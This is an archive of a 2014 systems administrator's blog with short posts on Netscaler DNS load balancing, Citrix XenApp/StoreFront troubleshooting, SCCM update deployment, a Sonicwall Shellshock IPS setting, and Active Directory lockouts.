Tuesday, October 14, 2014

Netscaler CLI to load balance DNS

Ahhhh, coffee and Netscaler CLI in the morning. It's going to be an awesome day!

I've always been comfortable at the command line. Back in the day I enjoyed poking around in DOS, and later on in Linux, Cisco, and Brocade. These days I don't get to do much networking as I'm much more focused on Citrix in my job duties.

Netscalers are almost a black box to many IT workers. There is little available in the way of books and training videos on Netscaler outside of Citrix eDocs and costly Citrix training. Learning Netscaler has been on my to-do list for quite a long time. We have two in my network that haven't been used for anything beyond Citrix Access Gateway until recently. If I'm going to learn something, doing it by CLI  and understanding the command syntax is going to stick in my brain and is going to be more efficient than clicking around a GUI.

This morning I'm configuring DNS load balancing on Netscaler 10.5 by way of the command line.

# In the proxy mode a DNS service type VIP is created
# To this VIP, external DNS servers are bound.
# External DNS Servers:;
# NetScaler appliance will respond to DNS queries on port 53

#Enable Load Balancing Feature:
enable ns feature lb

# Add external DNS servers:
add service ext_dns_1 dns 53
add service ext_dns_2 dns 53

# Create a custom DNS monitor (Using the default dns monitor will result in a state of DOWN. Using the default ping monitor is a bad idea. I've seen servers respond to pings even though essential services were down and I couldn't RDP into the server.)

add lb monitor ext_dns_1 DNS -query host.domain.com -queryType Address -LRTM ENABLED -destIP -destPort 53 -IPAddress <IPofHost>

add lb monitor ext_dns_2 DNS -query host.domain.com -queryType Address -LRTM ENABLED -destIP -destPort 53 -IPAddress <IPofHost>

# Bind monitor to the service:
bind monitor ext_dns_1 ext_dns_1
bind monitor ext_dns_2 ext_dns_2

# Create a DNS virtual server:
add lb vserver vdns dns 53

#Bind the external DNS services to the DNS virtual server:
bind lb vserver vdns ext_dns_1
bind lb vserver vdns ext_dns_2

Friday, September 26, 2014

CVE-2014-6271 Shellshock and Sonicwall IPS Signature gaffe?

If you manage a Sonicwall firewall, be aware that for some strange reason, Sonicwall decided to make the signature for Shellshock a "Low" priority. If you've enabled IPS on your Sonicwall firewall, and don't have "Prevent All" and "Detect All" checked for low priority attacks, then you're not protected. WTH? While the CVE and all reports mark it as high, 10/10, why the hell would Sonicwall mark it as low?

If you don't want to check prevent and/or detect for low priority signatures, you can still prevent Shellshock by searching for Signature ID 10529, and changing Prevention and Detection to Enable, which I recommend you do like, yesterday.

Monday, September 15, 2014

WMI Explorer Utility

WMI Explorer looks like a useful tool for the Windows and SCCM admin. From http://wmie.codeplex.com/

WMI Explorer is a utility intended to provide the ability to browse and view WMI namespaces/classes/instances/properties in a single pane of view.


• Ability to browse and view WMI namespaces/classes/instances/properties in a single pane of view.
• Ability to provide alternate credentials for connecting to remote computers.
• Ability to filter classes and instances matching specified criteria.
• Ability to view classes/instances in Managed Object Format (MOF).
• Ability to search classes, methods and properties with names matching specified criteria.
• Ability to run custom WQL queries.
• Automatic generation of WQL query for the selected Class/Instance.
• Automatic script creation (PowerShell and VBS).
• Highlighting of objects that have been previously viewed in the same session.
• Lists property enumeration values (if available). This is generally useful for SMS Provider classes.
• Lists property values containing embedded objects. This is especially useful for SMS Provider classes.
• Caching of retrieved classes/instances.

Friday, September 5, 2014

100 Days of DevOps with PowerShell

If you are a Windows admin, you need to get on the bus with Devops before you get left behind. I used to think of Devops as a Linux admin thing. With Powershell 4.0 and Windows Server 2012, Devops is here for Windows.

Why do you need Devops or Powershell on Windows systems? For starters, although some tasks may take less time to do manually than it would take the time to automate with a script, any repeatable process may benefit from automation with Powershell. If you have servers that share a common configuration, like web, email, or database servers, you can use Powershell Desired State Configuration to automate and enforce the configurations.

From the System Center Central blog:

What is PowerShell DSC?

Desired State Configuration (DSC) is a feature in PowerShell 4.0 and Windows Server 2012 R2 that helps Windows administrators manage and deploy software services’ configuration data and the environment the services run in.
DSC provides a set of PowerShell language extensions, cmdlets and a process called declarative scripting. The goal of DSC is to provide administrators with a method for maintaining consistent configuration sets across computers or devices.  You can write an expression describing a system configuration, and the system will evaluate and apply the configuration. Common use cases for PowerShell DSC include (but are not limited to):
  • Enabling or disabling server roles and features (like IIS)
  • Deploying new software
  • Deploy an IIS website (including the site content)
  • Managing registry settings
  • Running Windows PowerShell scripts
  • Managing files and directories
  • Starting, stopping, and managing processes and services
  • Managing groups and user accounts
  • Managing environment variables
  • Fixing a configuration that has drifted away from the desired state
  • Discovering the actual configuration state on a given node
The bottom line is PowerShell DSC enables IT Pros to support consistent, standardized configuration and continuous deployment, both core goals of DevOps.

Thursday, September 4, 2014

Force Desktops to launch in full screen mode in XenDesktop and XenApp 7.5

In earlier versions of XenApp you could make a desktop full screen in the published application settings. In XenApp/XenDesktop 7.5 this setting is no longer available. It's a little bit of an annoyance to have to click the top menu of Desktop Viewer to make it full screen, but even then it won't stretch across both screens in a dual monitor setup.

Lal Mohan at Citrixology has a very good post on how to edit StoreFront to launch a desktop in full screen mode.

On your StoreFront server, open the C:\inetpub\wwwroot\Citrix\<StoreName>\App_Data\default.ica file in Notepad, and add the line "DesktopViewer-ForceFullScreenStartup=true" under the [Application] section.

Thursday, August 28, 2014

How to Change the Server Base URL from HTTP to HTTPS on Citrix StoreFront

Complete the following steps to change the base URL:
  1. Go to StoreFront and click Server Group on the left panel.
  2. Click Change Base URL on the right panel.
  3. Type the base url and click OK.

XenApp or XenDesktop applications fail to launch

When accessing my StoreWeb URL, I clicked on an application icon and it would never launch, and at the bottom of the icon the circle would spin continuously. Citrix article CTX128009 fixed the issue.

Use the following registry key that allows you to configure the time-out as follows:
Name: ApplicationLaunchWaitTimeoutMS
Data: <required additional time-out, in milliseconds>
Note: Specifying a value of less than 10000 reverts to 10000 because 10 seconds is the minimum override.
Create the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Citrix\wfshell\TWI
Value Name: LogoffCheckerStartupDelayInSeconds
Value: An integer that denotes the time to wait for the application to start (10 Hexadecimal recommended)
Note: Setting this value also increases the time it takes for a user to log off the server.It is more useful as a troubleshooting step to confirm that the issue is due to the length of time required for your application to launch.

No certificate templates could be found Server 2008 R2

While attempting to request a web server certificate for my XenApp/XenDesktop Delivery Controller for use with Storefront, I get this error from the CA: "No certificate templates could be found. You do not have permission to request a certificate from this CA, or an error occurred while accessing the Active Directory."

I found this gem from John Nobile on social.technet.microsoft.com:
Instead of using IIS Manager to generate the request, you can do so manually. Opening the machine certificate MMC snap-in (mmc.exe -> File -> Add/Remove Snap-in ->Certificates -> Add -> Computer Account -> Next -> Local Computer -> Finish -> OK). Right click on the Certificates node under the “Personal” store. Select All Tasks -> Request New Certificate. When selecting the Web Server template from the enrollment wizard, open the template details and add both the machine name and fully qualified machine name of the web server as Common Names to the certificate subject.

Sunday, August 24, 2014

Slow XenApp 5 logons on Server 2008

My XenApp 5 farm published desktops running on Windows Server 2008 x86 had logon times averaging 69 seconds. Group Policy Registry items were taking 40 seconds as seen in the event logs.

I found Citrix article CTX128749. I added a new GPO with a scheduled task containing:
rd "C:\ProgramData\Microsoft\Group Policy\history" /s /q
I ran the above command and restarted all servers and then timed logons and they had decreased from 69 to 33 seconds. I can live with 33 second logons.

Thanks and a shout out to robissimo for pointing the Citrix article out to me.

Thursday, August 21, 2014

Creating Mandatory profiles

Over time I've noticed that as the number of GPO settings applied to my Citrix servers grow, so does the user logon times. I'm using XenApp to provide shared hosted desktops, and the logon times have grown to around a minute.

The solution is to use Mandatory profiles ( and redirected folders ) as long as you don't need for users to be able to save changes. That fits the bill for shared hosted desktops on a server. Instead of having a large number of user GPO settings applied at logon, we're going to customize the profile and save it to a network share, then set a GPO to use this profile for all users. Now you have a profile with all settings applied and you can eliminate many of those GPO's you were previously waiting on to apply. You can use Mandatory profiles along with redirected folders so that users can still get their own desktop and documents folders as well.

Instead of creating yet another tutorial, I'm going to point you to Rob Beekman's excellent blog post on how to create a Mandatory profile.

XenDesktop and XenApp black or frozen screen

This issue affects XenApp 7.5; XenDesktop 7.1 and 7.5 VDA Core Services for Windows Server OS (64-bit). After launching a published desktop or application, the screen may be completely black, or it may freeze.

Since this issues affects the default graphics mode, I'm scratching my head, amazed that Citrix doesn't include this fix in the ISO download of XenDesktop/XenApp 7.x. To make matters worse, you can't just visit the Citrix site and download this hotfix, you have to open a support ticket and they must email you a download link.

See CTX139901 for more info.

How to disable Citrix desktop auto launch in StoreFront

I'm not sure why Citrix thought it would be a good idea to automatically launch a published desktop in the Citrix Receiver for Web (StoreWeb) site in StoreFront and assumed that users wouldn't want to launch an application instead. It seems logical to not auto launch a desktop and have the administrator edit this config file value if they DO want it to auto launch.

To disable desktop auto launch:
Complete the following steps to disable the desktop launch:
  1. Go to C:\inetpub\wwwroot\Citrix\StoreWeb directory.
  2. Open the Web.config file with notepad.
  3. Set the autoLaunchDesktop parameter to “false”.
  1. Save the web.config file.

Tuesday, August 19, 2014

XenApp and XenDesktop 7.5 MCS creating Machine Catalogs and can't add VM's from vCenter 5.5

I'm building a XenApp 7.5 (Same code as XenDesktop 7.5 only a different license) environment, and hitting a wall when creating Machine Catalogs. Under the step "import or add virtual machines", I click on the "Add VMs" button, and can't browse past the top level of my vCenter cluster and can't see any vm's. I checked http://support.citrix.com/proddocs/topic/xenapp-xendesktop-75/cds-vmware-rho.html and the account I'm using meets the permissions requirements. I know that the issue isn't with this XenApp DC because I am able to connect to our secondary data center and browse vm's from this same DC.

I opened a support ticket with Citrix and VMware and after two weeks it still wasn't working.

While I was looking at the differences between the working and non working data centers, I noticed that in the data center that's working, I can only see vm's that are not part of a vApp in the Citrix Studio Console. I moved my XenApp 7.5 vm's out of the vApp and I can now connect to them with Citrix Studio.

If you are connecting XenApp or XenDesktop 7.5 to VMware vCenter 5.5, don't place your Citrix virtual machines to be managed inside of a vApp. I can't verify this issue on other versions of Citrix XenDesktop/XenApp or VMware vCenter.

The system cannot find the file specified failed to resolve the source 0x80070002

Some days SCCM will have you pulling your hair out in frustration. I frequently get errors when my OSD TS are installing programs or applications. It will work fine one time then fail the next.

This is the error I'm talking about:
Severity,Type,Site code,Date / Time,System,Component,Message ID,Description
Error,Milestone,NFK,8/19/2014 11:56:08 AM,COMPUTERNAME,Task Sequence Engine,11135,The task sequence execution engine failed executing the action (Run Command Line Copy default backgound image) in the group (Setup Operating System) with the error code 2147942402  Action output: ... 02 (e:\nts_sccm_release\sms\framework\tscore\resolvesource.cpp,3273) TS::Utility::ResolveSource (pszPkgID, sPath, 0, hUserToken, mapNetworkAccess), HRESULT=80070002 (e:\nts_sccm_release\sms\client\osdeployment\installsoftware\runcommandline.cpp,399)cmd.Execute(pszPkgID, sProgramName, dwCmdLineExitCode), HRESULT=80070002 (e:\nts_sccm_release\sms\client\osdeployment\installsoftware\main.cpp,372) WinHttpSendRequest failed. SendWinHttpRequest failed. 80072ee2. DownloadFile() failed for http://SERVER -FQDN:80/SMS_DP_SMSPKG$/NFK00079/sccm?/backgroundDefault.jpg, C:\_SMSTaskSequence\Packages\NFK00079\backgroundDefault.jpg. 80072ee2. Error downloading file from http://SERVER -FQDN:80/SMS_DP_SMSPKG$/NFK00079/sccm?/backgroundDefault.jpg toC:\_SMSTaskSequence\Packages\NFK00079\backgroundDefault.jpg  DownloadFiles() failed. 80072ee2. Download() failed. 80072ee2. Failed to resolve the source for SMS PKGID=NFK00079, hr=0x80070002 Install Software failed to run command line, hr=0x80070002. The operating system reported error 2147942402: The system cannot find the file specified.
To fix this, add the following Task Sequence Variables to the top of your TS.
SMSTSDownloadRetryCount = 5
SMSTSDownloadRetryDelay = 15

Configuring Automatic Deployment Rules for Software Updates in SCCM 2012

In deploying Microsoft updates, it's equally important to delay the updates as it is to apply them in order to prevent applying bad updates that cause unintended consequences, including the dreaded BSOD. In this post I'm going to show how to deploy MS updates using an Automatic Deployment Rule (ADR) in System Center Configuration Manager 2012 R2.

I have experimented with different patch schedules and methods over the years, and I'm going to outline what works best for me. Every month, I wait until a week after Patch Tuesday (Waiting a week gives bleeding edge users time to report issues and for Microsoft to pull the patch if necessary.) and deploy updates to my computer. If there are going to be any BSOD's, I would rather I catch it first instead of a few hundred or thousand of my users. After I let the updates "bake" on my computer for a week and don't encounter any issues, I deploy them to a small group of users. I pick a small group of people that are generally easy to work with and usually don't have any pressing deadlines to meet. I sometimes refer to this group as "The canary in the coal mine", because coal miners used a caged canary back in the old days to alert them to the presence of toxic gases because it would kill them before affecting the miners. If the canary drops dead, back out quickly! After the "canary" group bakes with these updates for a week without issue, its time to deploy the updates to the rest of your computers, including laptops. Some users will take their laptop home nightly and they may miss the collection's maintenance window of 4 to 7 AM. For these offsite laptops, I deploy updates a week after the bulk of the users. This gives the laptop users a chance to return to the office and pick up updates during the maintenance window. If this window is missed, the only effective way to get it done is to push the updates during working hours during lunch time, and suppress a restart. This may not be ideal, but what else are you going to do if they take the laptop home every night?

In the SCCM console, select Software Library, expand Software Updates and select Automatic Deployment rules. Click the button for "Create Automatic Deployment Rule".

Name your ADR and provide a description if you desire. Select a Deployment Template if you have created any. Select your collection, and select Create a new Software Update Group, and click Next.

On the Deployment Settings dialog, select "Use Wake-on-Lan if you desire. I don't use this feature as all of my computers automatically power on for the 4 AM maintenance window via BIOS settings. Click Next.

On the Software Updates dialog, set your property filters to select the updates you want. In my case I exclude a particular Bulletin ID that we have found to cause problems with our deployed applications by preceeding it with a minus.

Specify the Evaluation Schedule.

Specify the Deployment Schedule.

Specify the User Experience. I prefer to select "Hide in Software Center", and leave all boxes unchecked so that they only deploy during the collection's maintenance window. Click Next.

Specify an alert of 90 percent and 7 days, unless you prefer otherwise.

I leave the defaults selected on the Download Settings dialog, and click Next.

Select a Deployment Package if one exists, otherwise create a new deployment package and specify the source, then click Next.

Select a your Distribution Points or Distribution Point Group.

Accept the default on the Download Location dialog, and click Next.

Make the appropriate language selection, and click Next.

Carefully review the Summary page, click Save as a Template, and click Next if you don't need to make any changes, then click Close.

Repeat this process and for any other operating systems you manage and make changes as necessary.

Monday, August 18, 2014

Citrix products at a glance...

How to Configure Citrix Receiver Pass-Through Authentication for StoreFront or Web Interface

How to Configure Citrix Receiver Pass-Through Authentication for StoreFront or Web Interface

Desktop Virtualization Deployment Insights eBook

Printing IS important in the VDI environment

I manage a Citrix XenApp system. Recently during a business lunch our sales rep told us that his customers have had "great success" with VMware Horizon View as a Citrix replacement.

From what I've been reading on comparisons of VMware vs Citrix VDI, VMware is a little immature at the moment. I consider Citrix XenDesktop and XenApp to be mature and complete end to end products. Profile management? Check. Universal Printing? Check. Remote access? Check. (Netscaler) Then you also have GoToMeeting, GoToWebinar, Sharefile, and MDM. At first glance it looks like it would be easy to upgrade a Citrix environment with VMware Horizon View 6. VMware's webinar I watched recently said you just install the Horizon agent on your Citrix server to publish apps and you don't even have to uninstall Citrix.

The reality is that VMware Horizon View 6 lacks some key features, including universal printing and profile management. To be fair, if you are doing VDI on a Windows desktop OS, VMware has universal printing. However if you are publishing a desktop or application on a server OS, no universal printing. I think I'll stick with Citrix, thank you.

Here's a good summary of the differences between Citrix and VMware VDI client printing support.

Sunday, August 17, 2014

User changed password in AD and keeps getting locked out

I've noticed that Active Directory account lockouts seem to be more common these days. I believe this is a result of the use of mobile devices, with some users having multiple mobile devices.

The most common cause of account lockout is when a user changes their password and doesn't immediately update their password on a mobile device with an email account configured for ActiveSync. I've even had one person tell me that they did update their password on their iPhone, then after repeated account lockouts they remembered the iPad they left at home that also had their company email account on it.

If mobile devices with ActiveSync accounts isn't the cause, I recommend using Account Lockout Examiner, a freeware tool from Netwrix.

Netwrix Account Lockout Examiner: Alert your help desk staff about lockout events and troubleshoot account lockouts, analyzing potential causes. Accounts can be unlocked within the console, a Web-based interface or via a mobile device.

Download it here.

How to determine when a user changed their AD password with Powershell

Open the Powershell console as admin and type:

Import-Module ActiveDirectory
Get-ADUser ‘UserName’ -properties PasswordLastSet | Format-List

Pretty simple.

Friday, August 15, 2014

Best sales pitch ever!

Yesterday I attended a sales pitch for Barracuda backup appliances, hosted by SLAIT Consulting at Colonial Shooting Academy in Virginia Beach, VA. I always enjoy attending these events, if nothing else you always meet new people and get some lunch while learning about new technology.

What made this event so awesome is the fact that I love to shoot guns, and the event was at a gun store and shooting range. After lunch and the sales pitch we were given a safety brief and headed to the range. In addition to a selection of pistols, they laid out a couple of AR-15's and an AK-47 and all the ammo you could shoot. This was the first time I had ever shot an AR or AK. It was a BLAST!

First lonely post

Today I'm recovering from a very simple mistake that could have cost me weeks of work if I hadn't made a backup copy in VMware of my application server I am building for XenApp 7.5. I painstakingly installed and tweaked a long list of applications on Server 2008 R2 to be used for the master image in XenApp 7.5 Machine Creation Serices (MCS).

I hit a wall with an issue connecting my XenApp 7.5 DC to vSphere for the MCS connection. I submitted traces to Citrix support, who eventually called it a VMware issue. While waiting for VMware support, I decided to manually create the servers in VMware instead of using MCS so that I could forge ahead in the Citrix upgrade. I can always go back and integrate MCS after the VMware issue is resolved. I sysprepped my application server and created a vm template. After creating my first server from the template, I realized that I FORGOT TO UNCHECK "User cannot change password" for the administrator account before shutting the server down after running sysprep. Great, now I can't login since it forces you to set the administrator password on first login, and the password can't be changed.

What I SHOULD HAVE DONE is to clone my app server, then sysprep the clone and leave the original server intact. Thankfully I had created a backup copy of this server in the lab, so with a few clicks and a short delay I'm making progress again.

Sometimes its the simple things that can cause you the most pain.